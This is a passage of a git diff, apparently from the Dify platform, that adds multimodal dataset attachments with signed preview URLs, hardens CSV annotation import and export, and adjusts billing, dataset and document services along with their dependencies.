+Revises: d57accd375ae +Create Date: 2025-12-16 18:17:12.193877 + +""" +from alembic import op +import models as models +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision = '03ea244985ce' +down_revision = 'd57accd375ae' +branch_labels = None +depends_on = None + + +def upgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.add_column(sa.Column('type', sa.String(length=50), server_default=sa.text("'tool'"), nullable=False)) + # ### end Alembic commands ### + + +def downgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.drop_column('type') + # ### end Alembic commands ### diff --git a/api/models/dataset.py b/api/models/dataset.py index e072711b82..445ac6086f 100644 --- a/api/models/dataset.py +++ b/api/models/dataset.py @@ -19,7 +19,9 @@ from sqlalchemy.orm import Mapped, Session, mapped_column from configs import dify_config from core.rag.index_processor.constant.built_in_field import BuiltInField, MetadataDataSource +from core.rag.index_processor.constant.query_type import QueryType from core.rag.retrieval.retrieval_methods import RetrievalMethod +from core.tools.signature import sign_upload_file from extensions.ext_storage import storage from libs.uuid_utils import uuidv7 from services.entities.knowledge_entities.knowledge_entities import ParentMode, Rule @@ -76,6 +78,7 @@ class Dataset(Base): pipeline_id = mapped_column(StringUUID, nullable=True) chunk_structure = mapped_column(sa.String(255), nullable=True) enable_api = mapped_column(sa.Boolean, nullable=False, server_default=sa.text("true")) + is_multimodal = mapped_column(sa.Boolean, default=False, nullable=False, server_default=db.text("false")) @property def total_documents(self): @@ -728,9 +731,7 @@ class DocumentSegment(Base): created_by = mapped_column(StringUUID, nullable=False) created_at: Mapped[datetime] = mapped_column(DateTime, nullable=False, server_default=func.current_timestamp()) updated_by = mapped_column(StringUUID, nullable=True) - updated_at: Mapped[datetime] = mapped_column( - DateTime, nullable=False, server_default=func.current_timestamp(), onupdate=func.current_timestamp() - ) + updated_at: Mapped[datetime] = mapped_column(DateTime, nullable=False, server_default=func.current_timestamp()) indexing_at: Mapped[datetime | None] = mapped_column(DateTime, nullable=True) completed_at: Mapped[datetime | None] = mapped_column(DateTime, nullable=True) error = mapped_column(LongText, nullable=True) @@ -866,6 +867,47 @@ class DocumentSegment(Base): return text + @property + def attachments(self) -> list[dict[str, Any]]: + # Use JOIN to fetch attachments in a single query instead of two separate queries + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where( + SegmentAttachmentBinding.tenant_id == self.tenant_id, + SegmentAttachmentBinding.dataset_id == self.dataset_id, + SegmentAttachmentBinding.document_id == self.document_id, + SegmentAttachmentBinding.segment_id == self.id, + ) + ).all() + if not attachments_with_bindings: + return [] + attachment_list = [] + for _, attachment in attachments_with_bindings: + upload_file_id = attachment.id + nonce = os.urandom(16).hex() + timestamp = str(int(time.time())) + data_to_sign = f"image-preview|{upload_file_id}|{timestamp}|{nonce}" + secret_key = dify_config.SECRET_KEY.encode() if dify_config.SECRET_KEY else b"" + sign = hmac.new(secret_key, data_to_sign.encode(), hashlib.sha256).digest() + encoded_sign = base64.urlsafe_b64encode(sign).decode() + + params = f"timestamp={timestamp}&nonce={nonce}&sign={encoded_sign}" + reference_url = dify_config.CONSOLE_API_URL or "" + base_url = f"{reference_url}/files/{upload_file_id}/image-preview" + source_url = f"{base_url}?{params}" + attachment_list.append( + { + "id": attachment.id, + "name": attachment.name, + "size": attachment.size, + "extension": attachment.extension, + "mime_type": attachment.mime_type, + "source_url": source_url, + } + ) + return attachment_list + class ChildChunk(Base): __tablename__ = "child_chunks" @@ -963,6 +1005,38 @@ class DatasetQuery(TypeBase): DateTime, nullable=False, server_default=sa.func.current_timestamp(), init=False ) + @property + def queries(self) -> list[dict[str, Any]]: + try: + queries = json.loads(self.content) + if isinstance(queries, list): + for query in queries: + if query["content_type"] == QueryType.IMAGE_QUERY: + file_info = db.session.query(UploadFile).filter_by(id=query["content"]).first() + if file_info: + query["file_info"] = { + "id": file_info.id, + "name": file_info.name, + "size": file_info.size, + "extension": file_info.extension, + "mime_type": file_info.mime_type, + "source_url": sign_upload_file(file_info.id, file_info.extension), + } + else: + query["file_info"] = None + + return queries + else: + return [queries] + except JSONDecodeError: + return [ + { + "content_type": QueryType.TEXT_QUERY, + "content": self.content, + "file_info": None, + } + ] + class DatasetKeywordTable(TypeBase): __tablename__ = "dataset_keyword_tables" @@ -1458,6 +1532,7 @@ class PipelineRecommendedPlugin(TypeBase): ) plugin_id: Mapped[str] = mapped_column(LongText, nullable=False) provider_name: Mapped[str] = mapped_column(LongText, nullable=False) + type: Mapped[str] = mapped_column(sa.String(50), nullable=False, server_default=sa.text("'tool'")) position: Mapped[int] = mapped_column(sa.Integer, nullable=False, default=0) active: Mapped[bool] = mapped_column(sa.Boolean, nullable=False, default=True) created_at: Mapped[datetime] = mapped_column( @@ -1470,3 +1545,25 @@ class PipelineRecommendedPlugin(TypeBase): onupdate=func.current_timestamp(), init=False, ) + + +class SegmentAttachmentBinding(Base): + __tablename__ = "segment_attachment_bindings" + __table_args__ = ( + sa.PrimaryKeyConstraint("id", name="segment_attachment_binding_pkey"), + sa.Index( + "segment_attachment_binding_tenant_dataset_document_segment_idx", + "tenant_id", + "dataset_id", + "document_id", + "segment_id", + ), + sa.Index("segment_attachment_binding_attachment_idx", "attachment_id"), + ) + id: Mapped[str] = mapped_column(StringUUID, default=lambda: str(uuidv7())) + tenant_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + dataset_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + document_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + segment_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + attachment_id: Mapped[str] = mapped_column(StringUUID, nullable=False) + created_at: Mapped[datetime] = mapped_column(sa.DateTime, nullable=False, server_default=func.current_timestamp()) diff --git a/api/models/model.py b/api/models/model.py index 1731ff5699..88cb945b3f 100644 --- a/api/models/model.py +++ b/api/models/model.py @@ -111,7 +111,11 @@ class App(Base): else: app_model_config = self.app_model_config if app_model_config: - return app_model_config.pre_prompt + pre_prompt = app_model_config.pre_prompt or "" + # Truncate to 200 characters with ellipsis if using prompt as description + if len(pre_prompt) > 200: + return pre_prompt[:200] + "..." + return pre_prompt else: return "" @@ -259,7 +263,7 @@ class App(Base): provider_id = tool.get("provider_id", "") if provider_type == ToolProviderType.API: - if uuid.UUID(provider_id) not in existing_api_providers: + if provider_id not in existing_api_providers: deleted_tools.append( { "type": ToolProviderType.API, @@ -835,7 +839,29 @@ class Conversation(Base): @property def status_count(self): - messages = db.session.scalars(select(Message).where(Message.conversation_id == self.id)).all() + from models.workflow import WorkflowRun + + # Get all messages with workflow_run_id for this conversation + messages = db.session.scalars( + select(Message).where(Message.conversation_id == self.id, Message.workflow_run_id.isnot(None)) + ).all() + + if not messages: + return None + + # Batch load all workflow runs in a single query, filtered by this conversation's app_id + workflow_run_ids = [msg.workflow_run_id for msg in messages if msg.workflow_run_id] + workflow_runs = {} + + if workflow_run_ids: + workflow_runs_query = db.session.scalars( + select(WorkflowRun).where( + WorkflowRun.id.in_(workflow_run_ids), + WorkflowRun.app_id == self.app_id, # Filter by this conversation's app_id + ) + ).all() + workflow_runs = {run.id: run for run in workflow_runs_query} + status_counts = { WorkflowExecutionStatus.RUNNING: 0, WorkflowExecutionStatus.SUCCEEDED: 0, @@ -845,18 +871,24 @@ class Conversation(Base): } for message in messages: - if message.workflow_run: - status_counts[WorkflowExecutionStatus(message.workflow_run.status)] += 1 + # Guard against None to satisfy type checker and avoid invalid dict lookups + if message.workflow_run_id is None: + continue + workflow_run = workflow_runs.get(message.workflow_run_id) + if not workflow_run: + continue - return ( - { - "success": status_counts[WorkflowExecutionStatus.SUCCEEDED], - "failed": status_counts[WorkflowExecutionStatus.FAILED], - "partial_success": status_counts[WorkflowExecutionStatus.PARTIAL_SUCCEEDED], - } - if messages - else None - ) + try: + status_counts[WorkflowExecutionStatus(workflow_run.status)] += 1 + except (ValueError, KeyError): + # Handle invalid status values gracefully + pass + + return { + "success": status_counts[WorkflowExecutionStatus.SUCCEEDED], + "failed": status_counts[WorkflowExecutionStatus.FAILED], + "partial_success": status_counts[WorkflowExecutionStatus.PARTIAL_SUCCEEDED], + } @property def first_message(self): @@ -1255,13 +1287,9 @@ class Message(Base): "id": self.id, "app_id": self.app_id, "conversation_id": self.conversation_id, - "model_provider": self.model_provider, "model_id": self.model_id, "inputs": self.inputs, "query": self.query, - "message_tokens": self.message_tokens, - "answer_tokens": self.answer_tokens, - "provider_response_latency": self.provider_response_latency, "total_price": self.total_price, "message": self.message, "answer": self.answer, @@ -1283,12 +1311,8 @@ class Message(Base): id=data["id"], app_id=data["app_id"], conversation_id=data["conversation_id"], - model_provider=data.get("model_provider"), model_id=data["model_id"], inputs=data["inputs"], - message_tokens=data.get("message_tokens", 0), - answer_tokens=data.get("answer_tokens", 0), - provider_response_latency=data.get("provider_response_latency", 0.0), total_price=data["total_price"], query=data["query"], message=data["message"], diff --git a/api/models/workflow.py b/api/models/workflow.py index 42ee8a1f2b..853d5afefc 100644 --- a/api/models/workflow.py +++ b/api/models/workflow.py @@ -907,19 +907,29 @@ class WorkflowNodeExecutionModel(Base): # This model is expected to have `offlo @property def extras(self) -> dict[str, Any]: from core.tools.tool_manager import ToolManager + from core.trigger.trigger_manager import TriggerManager extras: dict[str, Any] = {} - if self.execution_metadata_dict: - if self.node_type == NodeType.TOOL and "tool_info" in self.execution_metadata_dict: - tool_info: dict[str, Any] = self.execution_metadata_dict["tool_info"] + execution_metadata = self.execution_metadata_dict + if execution_metadata: + if self.node_type == NodeType.TOOL and "tool_info" in execution_metadata: + tool_info: dict[str, Any] = execution_metadata["tool_info"] extras["icon"] = ToolManager.get_tool_icon( tenant_id=self.tenant_id, provider_type=tool_info["provider_type"], provider_id=tool_info["provider_id"], ) - elif self.node_type == NodeType.DATASOURCE and "datasource_info" in self.execution_metadata_dict: - datasource_info = self.execution_metadata_dict["datasource_info"] + elif self.node_type == NodeType.DATASOURCE and "datasource_info" in execution_metadata: + datasource_info = execution_metadata["datasource_info"] extras["icon"] = datasource_info.get("icon") + elif self.node_type == NodeType.TRIGGER_PLUGIN and "trigger_info" in execution_metadata: + trigger_info = execution_metadata["trigger_info"] or {} + provider_id = trigger_info.get("provider_id") + if provider_id: + extras["icon"] = TriggerManager.get_trigger_plugin_icon( + tenant_id=self.tenant_id, + provider_id=provider_id, + ) return extras def _get_offload_by_type(self, type_: ExecutionOffLoadType) -> Optional["WorkflowNodeExecutionOffload"]: diff --git a/api/pyproject.toml b/api/pyproject.toml index 2e7c96699f..9b2b3cd7ef 100644 --- a/api/pyproject.toml +++ b/api/pyproject.toml @@ -1,9 +1,10 @@ [project] name = "dify-api" -version = "1.10.1" +version = "1.11.1" requires-python = ">=3.11,<3.13" dependencies = [ + "aliyun-log-python-sdk~=0.9.37", "arize-phoenix-otel~=0.9.2", "azure-identity==1.16.1", "beautifulsoup4==4.12.2", @@ -31,6 +32,7 @@ dependencies = [ "httpx[socks]~=0.27.0", "jieba==0.42.1", "json-repair>=0.41.1", + "jsonschema>=4.25.1", "langfuse~=2.51.3", "langsmith~=0.1.77", "langdetect~=1.0.9", @@ -92,7 +94,6 @@ dependencies = [ "weaviate-client==4.17.0", "apscheduler>=3.11.0", "weave>=0.52.16", - "jsonschema>=4.25.1", ] # Before adding new dependency, consider place it in # alphabet order (a-z) and suitable group. @@ -152,7 +153,7 @@ dev = [ "types-pywin32~=310.0.0", "types-pyyaml~=6.0.12", "types-regex~=2024.11.6", - "types-shapely~=2.0.0", + "types-shapely~=2.1.0", "types-simplejson>=3.20.0", "types-six>=1.17.0", "types-tensorflow>=2.18.0", @@ -217,6 +218,7 @@ vdb = [ "pymochow==2.2.9", "pyobvector~=0.2.17", "qdrant-client==1.9.0", + "intersystems-irispython>=5.1.0", "tablestore==6.3.7", "tcvectordb~=1.6.4", "tidb-vector==0.0.9", diff --git a/api/pytest.ini b/api/pytest.ini index afb53b47cc..4a9470fa0c 100644 --- a/api/pytest.ini +++ b/api/pytest.ini @@ -1,5 +1,5 @@ [pytest] -addopts = --cov=./api --cov-report=json --cov-report=xml +addopts = --cov=./api --cov-report=json env = ANTHROPIC_API_KEY = sk-ant-api11-IamNotARealKeyJustForMockTestKawaiiiiiiiiii-NotBaka-ASkksz AZURE_OPENAI_API_BASE = https://difyai-openai.openai.azure.com diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py index 9258def907..d03cbddceb 100644 --- a/api/services/annotation_service.py +++ b/api/services/annotation_service.py @@ -1,10 +1,14 @@ +import logging import uuid import pandas as pd + +logger = logging.getLogger(__name__) from sqlalchemy import or_, select from werkzeug.datastructures import FileStorage from werkzeug.exceptions import NotFound +from core.helper.csv_sanitizer import CSVSanitizer from extensions.ext_database import db from extensions.ext_redis import redis_client from libs.datetime_utils import naive_utc_now @@ -155,6 +159,12 @@ class AppAnnotationService: @classmethod def export_annotation_list_by_app_id(cls, app_id: str): + """ + Export all annotations for an app with CSV injection protection. + + Sanitizes question and content fields to prevent formula injection attacks + when exported to CSV format. + """ # get app info _, current_tenant_id = current_account_with_tenant() app = ( @@ -171,6 +181,16 @@ class AppAnnotationService: .order_by(MessageAnnotation.created_at.desc()) .all() ) + + # Sanitize CSV-injectable fields to prevent formula injection + for annotation in annotations: + # Sanitize question field if present + if annotation.question: + annotation.question = CSVSanitizer.sanitize_value(annotation.question) + # Sanitize content field (answer) + if annotation.content: + annotation.content = CSVSanitizer.sanitize_value(annotation.content) + return annotations @classmethod @@ -330,6 +350,18 @@ class AppAnnotationService: @classmethod def batch_import_app_annotations(cls, app_id, file: FileStorage): + """ + Batch import annotations from CSV file with enhanced security checks. + + Security features: + - File size validation + - Row count limits (min/max) + - Memory-efficient CSV parsing + - Subscription quota validation + - Concurrency tracking + """ + from configs import dify_config + # get app info current_user, current_tenant_id = current_account_with_tenant() app = ( @@ -341,16 +373,80 @@ class AppAnnotationService: if not app: raise NotFound("App not found") + job_id: str | None = None # Initialize to avoid unbound variable error try: - # Skip the first row - df = pd.read_csv(file.stream, dtype=str) - result = [] - for _, row in df.iterrows(): - content = {"question": row.iloc[0], "answer": row.iloc[1]} + # Quick row count check before full parsing (memory efficient) + # Read only first chunk to estimate row count + file.stream.seek(0) + first_chunk = file.stream.read(8192) # Read first 8KB + file.stream.seek(0) + + # Estimate row count from first chunk + newline_count = first_chunk.count(b"\n") + if newline_count == 0: + raise ValueError("The CSV file appears to be empty or invalid.") + + # Parse CSV with row limit to prevent memory exhaustion + # Use chunksize for memory-efficient processing + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS + + # Read CSV in chunks to avoid loading entire file into memory + df = pd.read_csv( + file.stream, + dtype=str, + nrows=max_records + 1, # Read one extra to detect overflow + engine="python", + on_bad_lines="skip", # Skip malformed lines instead of crashing + ) + + # Validate column count + if len(df.columns) < 2: + raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).") + + # Build result list with validation + result: list[dict] = [] + for idx, row in df.iterrows(): + # Stop if we exceed the limit + if len(result) >= max_records: + raise ValueError( + f"The CSV file contains too many records. Maximum {max_records} records allowed per import. " + f"Please split your file into smaller batches." + ) + + # Extract and validate question and answer + try: + question_raw = row.iloc[0] + answer_raw = row.iloc[1] + except (IndexError, KeyError): + continue # Skip malformed rows + + # Convert to string and strip whitespace + question = str(question_raw).strip() if question_raw is not None else "" + answer = str(answer_raw).strip() if answer_raw is not None else "" + + # Skip empty entries or NaN values + if not question or not answer or question.lower() == "nan" or answer.lower() == "nan": + continue + + # Validate length constraints (idx is pandas index, convert to int for display) + row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2 + if len(question) > 2000: + raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.") + if len(answer) > 10000: + raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.") + + content = {"question": question, "answer": answer} result.append(content) - if len(result) == 0: - raise ValueError("The CSV file is empty.") - # check annotation limit + + # Validate minimum records + if len(result) < min_records: + raise ValueError( + f"The CSV file must contain at least {min_records} valid annotation record(s). " + f"Found {len(result)} valid record(s)." + ) + + # Check annotation quota limit features = FeatureService.get_features(current_tenant_id) if features.billing.enabled: annotation_quota_limit = features.annotation_quota_limit @@ -359,12 +455,34 @@ class AppAnnotationService: # async job job_id = str(uuid.uuid4()) indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}" - # send batch add segments task + + # Register job in active tasks list for concurrency tracking + current_time = int(naive_utc_now().timestamp() * 1000) + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zadd(active_jobs_key, {job_id: current_time}) + redis_client.expire(active_jobs_key, 7200) # 2 hours TTL + + # Set job status redis_client.setnx(indexing_cache_key, "waiting") batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id) - except Exception as e: + + except ValueError as e: return {"error_msg": str(e)} - return {"job_id": job_id, "job_status": "waiting"} + except Exception as e: + # Clean up active job registration on error (only if job was created) + if job_id is not None: + try: + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + redis_client.zrem(active_jobs_key, job_id) + except Exception: + # Silently ignore cleanup errors - the job will be auto-expired + logger.debug("Failed to clean up active job tracking during error handling") + + # Check if it's a CSV parsing error + error_str = str(e) + return {"error_msg": f"An error occurred while processing the file: {error_str}"} + + return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)} @classmethod def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit): diff --git a/api/services/attachment_service.py b/api/services/attachment_service.py new file mode 100644 index 0000000000..2bd5627d5e --- /dev/null +++ b/api/services/attachment_service.py @@ -0,0 +1,31 @@ +import base64 + +from sqlalchemy import Engine +from sqlalchemy.orm import sessionmaker +from werkzeug.exceptions import NotFound + +from extensions.ext_storage import storage +from models.model import UploadFile + +PREVIEW_WORDS_LIMIT = 3000 + + +class AttachmentService: + _session_maker: sessionmaker + + def __init__(self, session_factory: sessionmaker | Engine | None = None): + if isinstance(session_factory, Engine): + self._session_maker = sessionmaker(bind=session_factory) + elif isinstance(session_factory, sessionmaker): + self._session_maker = session_factory + else: + raise AssertionError("must be a sessionmaker or an Engine.") + + def get_file_base64(self, file_id: str) -> str: + upload_file = ( + self._session_maker(expire_on_commit=False).query(UploadFile).where(UploadFile.id == file_id).first() + ) + if not upload_file: + raise NotFound("File not found") + blob = storage.load_once(upload_file.key) + return base64.b64encode(blob).decode() diff --git a/api/services/billing_service.py b/api/services/billing_service.py index 54e1c9d285..3d7cb6cc8d 100644 --- a/api/services/billing_service.py +++ b/api/services/billing_service.py @@ -1,8 +1,12 @@ +import logging import os +from collections.abc import Sequence from typing import Literal import httpx +from pydantic import TypeAdapter from tenacity import retry, retry_if_exception_type, stop_before_delay, wait_fixed +from typing_extensions import TypedDict from werkzeug.exceptions import InternalServerError from enums.cloud_plan import CloudPlan @@ -11,6 +15,15 @@ from extensions.ext_redis import redis_client from libs.helper import RateLimiter from models import Account, TenantAccountJoin, TenantAccountRole +logger = logging.getLogger(__name__) + + +class SubscriptionPlan(TypedDict): + """Tenant subscriptionplan information.""" + + plan: str + expiration_date: int + class BillingService: base_url = os.environ.get("BILLING_API_URL", "BILLING_API_URL") @@ -239,3 +252,39 @@ class BillingService: def sync_partner_tenants_bindings(cls, account_id: str, partner_key: str, click_id: str): payload = {"account_id": account_id, "click_id": click_id} return cls._send_request("PUT", f"/partners/{partner_key}/tenants", json=payload) + + @classmethod + def get_plan_bulk(cls, tenant_ids: Sequence[str]) -> dict[str, SubscriptionPlan]: + """ + Bulk fetch billing subscription plan via billing API. + Payload: {"tenant_ids": ["t1", "t2", ...]} (max 200 per request) + Returns: + Mapping of tenant_id -> {plan: str, expiration_date: int} + """ + results: dict[str, SubscriptionPlan] = {} + subscription_adapter = TypeAdapter(SubscriptionPlan) + + chunk_size = 200 + for i in range(0, len(tenant_ids), chunk_size): + chunk = tenant_ids[i : i + chunk_size] + try: + resp = cls._send_request("POST", "/subscription/plan/batch", json={"tenant_ids": chunk}) + data = resp.get("data", {}) + + for tenant_id, plan in data.items(): + subscription_plan = subscription_adapter.validate_python(plan) + results[tenant_id] = subscription_plan + except Exception: + logger.exception("Failed to fetch billing info batch for tenants: %s", chunk) + continue + + return results + + @classmethod + def get_expired_subscription_cleanup_whitelist(cls) -> Sequence[str]: + resp = cls._send_request("GET", "/subscription/cleanup/whitelist") + data = resp.get("data", []) + tenant_whitelist = [] + for item in data: + tenant_whitelist.append(item["tenant_id"]) + return tenant_whitelist diff --git a/api/services/conversation_service.py b/api/services/conversation_service.py index 39d6c81621..5253199552 100644 --- a/api/services/conversation_service.py +++ b/api/services/conversation_service.py @@ -118,7 +118,7 @@ class ConversationService: app_model: App, conversation_id: str, user: Union[Account, EndUser] | None, - name: str, + name: str | None, auto_generate: bool, ): conversation = cls.get_conversation(app_model, conversation_id, user) diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py index bb09311349..970192fde5 100644 --- a/api/services/dataset_service.py +++ b/api/services/dataset_service.py @@ -7,7 +7,7 @@ import time import uuid from collections import Counter from collections.abc import Sequence -from typing import Any, Literal +from typing import Any, Literal, cast import sqlalchemy as sa from redis.exceptions import LockNotOwnedError @@ -19,9 +19,10 @@ from configs import dify_config from core.errors.error import LLMBadRequestError, ProviderTokenNotInitError from core.helper.name_generator import generate_incremental_name from core.model_manager import ModelManager -from core.model_runtime.entities.model_entities import ModelType +from core.model_runtime.entities.model_entities import ModelFeature, ModelType +from core.model_runtime.model_providers.__base.text_embedding_model import TextEmbeddingModel from core.rag.index_processor.constant.built_in_field import BuiltInField -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.retrieval.retrieval_methods import RetrievalMethod from enums.cloud_plan import CloudPlan from events.dataset_event import dataset_was_deleted @@ -46,6 +47,7 @@ from models.dataset import ( DocumentSegment, ExternalKnowledgeBindings, Pipeline, + SegmentAttachmentBinding, ) from models.model import UploadFile from models.provider_ids import ModelProviderID @@ -363,6 +365,27 @@ class DatasetService: except ProviderTokenNotInitError as ex: raise ValueError(ex.description) + @staticmethod + def check_is_multimodal_model(tenant_id: str, model_provider: str, model: str): + try: + model_manager = ModelManager() + model_instance = model_manager.get_model_instance( + tenant_id=tenant_id, + provider=model_provider, + model_type=ModelType.TEXT_EMBEDDING, + model=model, + ) + text_embedding_model = cast(TextEmbeddingModel, model_instance.model_type_instance) + model_schema = text_embedding_model.get_model_schema(model_instance.model, model_instance.credentials) + if not model_schema: + raise ValueError("Model schema not found") + if model_schema.features and ModelFeature.VISION in model_schema.features: + return True + else: + return False + except LLMBadRequestError: + raise ValueError("No Model available. Please configure a valid provider in the Settings -> Model Provider.") + @staticmethod def check_reranking_model_setting(tenant_id: str, reranking_model_provider: str, reranking_model: str): try: @@ -402,13 +425,13 @@ class DatasetService: if not dataset: raise ValueError("Dataset not found") # check if dataset name is exists - - if DatasetService._has_dataset_same_name( - tenant_id=dataset.tenant_id, - dataset_id=dataset_id, - name=data.get("name", dataset.name), - ): - raise ValueError("Dataset name already exists") + if data.get("name") and data.get("name") != dataset.name: + if DatasetService._has_dataset_same_name( + tenant_id=dataset.tenant_id, + dataset_id=dataset_id, + name=data.get("name", dataset.name), + ): + raise ValueError("Dataset name already exists") # Verify user has permission to update this dataset DatasetService.check_dataset_permission(dataset, user) @@ -650,6 +673,8 @@ class DatasetService: Returns: str: Action to perform ('add', 'remove', 'update', or None) """ + if "indexing_technique" not in data: + return None if dataset.indexing_technique != data["indexing_technique"]: if data["indexing_technique"] == "economy": # Remove embedding model configuration for economy mode @@ -844,6 +869,12 @@ class DatasetService: model_type=ModelType.TEXT_EMBEDDING, model=knowledge_configuration.embedding_model or "", ) + is_multimodal = DatasetService.check_is_multimodal_model( + current_user.current_tenant_id, + knowledge_configuration.embedding_model_provider, + knowledge_configuration.embedding_model, + ) + dataset.is_multimodal = is_multimodal dataset.embedding_model = embedding_model.model dataset.embedding_model_provider = embedding_model.provider dataset_collection_binding = DatasetCollectionBindingService.get_dataset_collection_binding( @@ -880,6 +911,12 @@ class DatasetService: dataset_collection_binding = DatasetCollectionBindingService.get_dataset_collection_binding( embedding_model.provider, embedding_model.model ) + is_multimodal = DatasetService.check_is_multimodal_model( + current_user.current_tenant_id, + knowledge_configuration.embedding_model_provider, + knowledge_configuration.embedding_model, + ) + dataset.is_multimodal = is_multimodal dataset.collection_binding_id = dataset_collection_binding.id dataset.indexing_technique = knowledge_configuration.indexing_technique except LLMBadRequestError: @@ -937,6 +974,12 @@ class DatasetService: ) ) dataset.collection_binding_id = dataset_collection_binding.id + is_multimodal = DatasetService.check_is_multimodal_model( + current_user.current_tenant_id, + knowledge_configuration.embedding_model_provider, + knowledge_configuration.embedding_model, + ) + dataset.is_multimodal = is_multimodal except LLMBadRequestError: raise ValueError( "No Embedding Model available. Please configure a valid provider " @@ -1376,7 +1419,7 @@ class DocumentService: document.name = name db.session.add(document) - if document.data_source_info_dict: + if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict: db.session.query(UploadFile).where( UploadFile.id == document.data_source_info_dict["upload_file_id"] ).update({UploadFile.name: name}) @@ -1593,6 +1636,20 @@ class DocumentService: return [], "" db.session.add(dataset_process_rule) db.session.flush() + else: + # Fallback when no process_rule provided in knowledge_config: + # 1) reuse dataset.latest_process_rule if present + # 2) otherwise create an automatic rule + dataset_process_rule = getattr(dataset, "latest_process_rule", None) + if not dataset_process_rule: + dataset_process_rule = DatasetProcessRule( + dataset_id=dataset.id, + mode="automatic", + rules=json.dumps(DatasetProcessRule.AUTOMATIC_RULES), + created_by=account.id, + ) + db.session.add(dataset_process_rule) + db.session.flush() lock_name = f"add_document_lock_dataset_id_{dataset.id}" try: with redis_client.lock(lock_name, timeout=600): @@ -1604,65 +1661,67 @@ class DocumentService: if not knowledge_config.data_source.info_list.file_info_list: raise ValueError("File source info is required") upload_file_list = knowledge_config.data_source.info_list.file_info_list.file_ids - for file_id in upload_file_list: - file = ( - db.session.query(UploadFile) - .where(UploadFile.tenant_id == dataset.tenant_id, UploadFile.id == file_id) - .first() + files = ( + db.session.query(UploadFile) + .where( + UploadFile.tenant_id == dataset.tenant_id, + UploadFile.id.in_(upload_file_list), ) + .all() + ) + if len(files) != len(set(upload_file_list)): + raise FileNotExistsError("One or more files not found.") - # raise error if file not found - if not file: - raise FileNotExistsError() - - file_name = file.name + file_names = [file.name for file in files] + db_documents = ( + db.session.query(Document) + .where( + Document.dataset_id == dataset.id, + Document.tenant_id == current_user.current_tenant_id, + Document.data_source_type == "upload_file", + Document.enabled == True, + Document.name.in_(file_names), + ) + .all() + ) + documents_map = {document.name: document for document in db_documents} + for file in files: data_source_info: dict[str, str | bool] = { - "upload_file_id": file_id, + "upload_file_id": file.id, } - # check duplicate - if knowledge_config.duplicate: - document = ( - db.session.query(Document) - .filter_by( - dataset_id=dataset.id, - tenant_id=current_user.current_tenant_id, - data_source_type="upload_file", - enabled=True, - name=file_name, - ) - .first() + document = documents_map.get(file.name) + if knowledge_config.duplicate and document: + document.dataset_process_rule_id = dataset_process_rule.id + document.updated_at = naive_utc_now() + document.created_from = created_from + document.doc_form = knowledge_config.doc_form + document.doc_language = knowledge_config.doc_language + document.data_source_info = json.dumps(data_source_info) + document.batch = batch + document.indexing_status = "waiting" + db.session.add(document) + documents.append(document) + duplicate_document_ids.append(document.id) + continue + else: + document = DocumentService.build_document( + dataset, + dataset_process_rule.id, + knowledge_config.data_source.info_list.data_source_type, + knowledge_config.doc_form, + knowledge_config.doc_language, + data_source_info, + created_from, + position, + account, + file.name, + batch, ) - if document: - document.dataset_process_rule_id = dataset_process_rule.id - document.updated_at = naive_utc_now() - document.created_from = created_from - document.doc_form = knowledge_config.doc_form - document.doc_language = knowledge_config.doc_language - document.data_source_info = json.dumps(data_source_info) - document.batch = batch - document.indexing_status = "waiting" - db.session.add(document) - documents.append(document) - duplicate_document_ids.append(document.id) - continue - document = DocumentService.build_document( - dataset, - dataset_process_rule.id, - knowledge_config.data_source.info_list.data_source_type, - knowledge_config.doc_form, - knowledge_config.doc_language, - data_source_info, - created_from, - position, - account, - file_name, - batch, - ) - db.session.add(document) - db.session.flush() - document_ids.append(document.id) - documents.append(document) - position += 1 + db.session.add(document) + db.session.flush() + document_ids.append(document.id) + documents.append(document) + position += 1 elif knowledge_config.data_source.info_list.data_source_type == "notion_import": notion_info_list = knowledge_config.data_source.info_list.notion_info_list # type: ignore if not notion_info_list: @@ -2305,6 +2364,7 @@ class DocumentService: embedding_model_provider=knowledge_config.embedding_model_provider, collection_binding_id=dataset_collection_binding_id, retrieval_model=retrieval_model.model_dump() if retrieval_model else None, + is_multimodal=knowledge_config.is_multimodal, ) db.session.add(dataset) @@ -2685,6 +2745,13 @@ class SegmentService: if "content" not in args or not args["content"] or not args["content"].strip(): raise ValueError("Content is empty") + if args.get("attachment_ids"): + if not isinstance(args["attachment_ids"], list): + raise ValueError("Attachment IDs is invalid") + single_chunk_attachment_limit = dify_config.SINGLE_CHUNK_ATTACHMENT_LIMIT + if len(args["attachment_ids"]) > single_chunk_attachment_limit: + raise ValueError(f"Exceeded maximum attachment limit of {single_chunk_attachment_limit}") + @classmethod def create_segment(cls, args: dict, document: Document, dataset: Dataset): assert isinstance(current_user, Account) @@ -2731,27 +2798,39 @@ class SegmentService: segment_document.word_count += len(args["answer"]) segment_document.answer = args["answer"] - db.session.add(segment_document) - # update document word count - assert document.word_count is not None - document.word_count += 